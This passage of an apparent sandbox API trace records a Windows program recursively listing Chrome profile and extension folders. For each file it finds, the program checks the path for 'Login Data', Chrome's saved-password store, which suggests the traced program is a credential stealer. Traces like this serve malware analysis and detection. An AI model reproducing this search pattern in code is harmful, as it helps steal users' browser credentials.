returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*" [0161.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.526] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.526] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.526] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.526] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.526] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0161.526] lstrlenW (lpString="\\") returned 1 [0161.526] GetProcessHeap () returned 0x8e0000 [0161.526] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.526] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0161.526] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" [0161.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned 138 [0161.526] lstrlenW (lpString="messages.json") returned 13 [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.527] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" [0161.527] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" [0161.527] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.527] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0161.527] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.527] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.527] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.527] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.527] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.527] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="cs", cAlternateFileName="")) returned 1 [0161.527] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0161.527] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0161.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.527] lstrlenW (lpString="\\") returned 1 [0161.527] GetProcessHeap () returned 0x8e0000 [0161.527] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.527] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.527] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.527] lstrlenW (lpString="cs") returned 2 [0161.527] GetProcessHeap () returned 0x8e0000 [0161.528] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0161.528] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.528] GetProcessHeap () returned 0x8e0000 [0161.528] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0161.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0161.528] lstrlenW (lpString="\\*.*") returned 4 [0161.528] GetProcessHeap () returned 0x8e0000 [0161.528] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0161.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*" [0161.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.528] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.528] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.528] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.528] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.528] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0161.528] lstrlenW (lpString="\\") returned 1 [0161.528] GetProcessHeap () returned 0x8e0000 [0161.528] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0161.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" [0161.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned 138 [0161.529] lstrlenW (lpString="messages.json") returned 13 [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.529] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" [0161.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" [0161.529] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0161.529] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.529] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.529] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.529] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.529] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.529] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="da", cAlternateFileName="")) returned 1 [0161.529] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0161.529] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0161.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.529] lstrlenW (lpString="\\") returned 1 [0161.529] GetProcessHeap () returned 0x8e0000 [0161.529] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.529] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.530] lstrlenW (lpString="da") returned 2 [0161.530] GetProcessHeap () returned 0x8e0000 [0161.530] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 